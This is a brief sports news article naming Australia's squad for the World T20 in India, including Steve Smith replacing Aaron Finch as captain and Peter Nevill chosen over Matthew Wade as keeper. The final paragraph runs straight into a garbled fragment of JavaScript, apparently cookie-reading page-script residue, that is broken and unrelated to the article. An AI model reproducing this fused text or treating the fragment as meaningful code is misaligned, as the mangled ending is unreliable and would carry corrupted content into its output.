Australia's 15-man squad for next month's World T20 in India has been announced, with some shock inclusions.

As reported yesterday, Steve Smith has replaced Aaron Finch as captain of the side, while perhaps the biggest shock of all, Peter Nevill has replaced Matthew Wade behind the stumps.

Wade has been the keeper of choice in the shorter formats since Brad Haddin's reitrement, but Test wicketkeeper Nevill, who has never even played a 50-over game for Australia and averages only 15.75 with the bat in the Big Bash League, was chosen ahead of the Victorian keeper.

Shaun Marsh has also been left out, despite an impressive Big Bash.

Ashton Agar's inclusion in the World Cup squad is also somewhat of a suprise, having never played an international T20 for Australia.

Squad: Steve Smith (c), Dave Warner (vc), Aaron Finch, Ashton Agar, Nathan Coulter-Nile, James Faulkner, John Hastings, Josh Hazlewood, Usman Khawaja, Mitchell Marsh, Glenn Maxwell, Peter Nevill, Andrew Tye, Shane Watson, Adam Zampa.

Australia's opening match of the World T20 will be against New Zealand on Friday March 18, in Dharamsala. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
